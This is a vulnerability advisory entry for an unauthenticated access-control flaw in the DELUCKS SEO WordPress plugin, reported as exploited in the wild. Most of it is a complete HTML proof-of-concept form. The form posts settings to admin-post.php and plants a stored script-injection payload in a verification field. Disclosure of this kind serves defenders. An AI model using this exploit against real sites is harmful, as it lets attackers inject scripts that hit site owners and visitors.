Main Vulnerability Database Vulnerabilities #VU21333

#VU21333 Improper access control in DELUCKS SEO

Published: September 25, 2019

Vulnerability identifier: #VU21333

Vulnerability risk: High

CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:A/U:Amber

CVE-ID: N/A

CWE-ID: CWE-284

Exploitation vector: Remote access

Exploit availability: The vulnerability is being exploited in the wild

Vulnerable software:
DELUCKS SEO

Software vendor:
DELUCKS GmbH

Description

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote non-authenticated attacker can bypass implemented security restrictions and execute arbitrary JavaScript code on the website.

Note: this vulnerability is being actively exploited in the wild.

PoC:

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="dpc_save_settings" />
<input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" />
<input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][desc]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" />
<input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" />
<input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" />
<input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Remediation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

#VU21333 Improper access control in DELUCKS SEO

Description

Remediation

External links

Please verify you're human